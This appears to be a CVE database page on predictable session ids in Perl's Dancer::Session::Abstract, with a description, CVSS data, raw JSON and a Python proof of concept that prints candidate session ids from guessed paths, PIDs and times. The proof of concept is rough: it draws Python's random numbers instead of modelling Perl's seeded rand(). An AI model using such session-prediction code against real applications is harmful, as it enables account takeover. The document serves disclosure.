Security Vulnerability Report
CVE-2026-5080 CVSS 5.9 MEDIUM

Published: 2026-04-30 12:16:24
Last Modified: 2026-05-05 02:54:43
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Dancer::Session::Abstract versions through 1.3522 for Perl generate session ids insecurely.

The session id is generated by summing the character codepoints of the absolute pathname with the process id, the epoch time and calls to the built-in rand() function to return a number between 0 and 999-billion, and concatenating that result three times.

The path name might be known or guessed by an attacker, especially for applications known to be written using Dancer with standard installation locations.

The epoch time can be guessed by an attacker, and may be leaked in the HTTP header.

The process id comes from a small set of numbers, and workers may have sequential process ids.

The built-in rand() function is seeded with 32 bits and is considered unsuitable for security applications.

Predictable session ids could allow an attacker to gain access to systems.

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:perldancer:dancer\:\:session\:\:abstract:*:*:*:*:*:perl:*:* - VULNERABLE
Dancer::Session::Abstract <= 1.3522

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC: Simulating the vulnerable session ID generation logic in Python
# This script demonstrates how predictable the session ID generation is.
import random
import time


def generate_vulnerable_sid(path, pid, epoch_time):
    # Sum of character codepoints of the absolute pathname
    path_sum = sum(ord(c) for c in path)
    # Insecure rand() call (0 to 999-billion)
    # Note: Actual vulnerability uses Perl's rand() with 32-bit seed
    random_val = random.randint(0, 999_000_000_000)
    # Calculate the seed number
    seed = path_sum + pid + epoch_time + random_val
    # Concatenate the result three times
    return f"{seed}{seed}{seed}"


# Scenario: Attacker knows the target path and approx time
print("[+] CVE-2026-5080 Session ID Prediction PoC")

# Common installation path for Perl apps
target_path = "/var/www/html/MyDancerApp"
# PIDs are often sequential and in a small range (e.g., worker processes)
guessed_pids = [1200, 1201, 1202]
# Attacker captures the request time from HTTP 'Date' header
request_time = int(time.time())

print(f"[*] Target Path: {target_path}")
print(f"[*] Request Time (Epoch): {request_time}")
print(f"[*] Guessing PIDs: {guessed_pids}")
print("[*] Generating possible Session IDs:")

for pid in guessed_pids:
    # Since rand() is weak, we can try a few random values or just the logic
    # For demonstration, we generate one ID per PID with a random factor
    sid = generate_vulnerable_sid(target_path, pid, request_time)
    print(f"    PID {pid}: {sid}")

print("[!] An attacker could brute force the 'rand' part due to 32-bit seed space.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5080", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-30T12:16:24.333", "lastModified": "2026-05-05T02:54:42.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dancer::Session::Abstract versions through 1.3522 for Perl generates session ids insecurely.\n\nThe session id is generated from summing the character codepoints of the absolute pathname with the process id, the epoch time and calls to the built-in rand() function to return a number between 0 and 999-billion, and concatenating that result three times.\n\nThe path name might be known or guessed by an attacker, especially for applications known to be written using Dancer with standard installation locations.\n\nThe epoch time can be guessed by an attacker, and may be leaked in the HTTP header.\n\nThe process id comes from a small set of numbers, and workers may have sequential process ids.\n\nThe built-in rand() function is seeded with 32-bits and is considered unsuitable for security applications.\n\nPredictable session ids could allow an attacker to gain access to systems."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-338"}, {"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:perldancer:dancer\\:\\:session\\:\\:abstract:*:*:*:*:*:perl:*:*", "versionEndIncluding": "1.3522", "matchCriteriaId": "D47CD43F-7C33-4D6F-BEFB-C820BB2D6777"}]}]}], "references": [{"url": "https://metacpan.org/release/BIGPRESH/Dancer-1.3522/source/lib/Dancer/Session/Abstract.pm#L85-102", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://security.metacpan.org/patches/D/Dancer/1.3522/CVE-2026-5080-r1.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/30/19", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}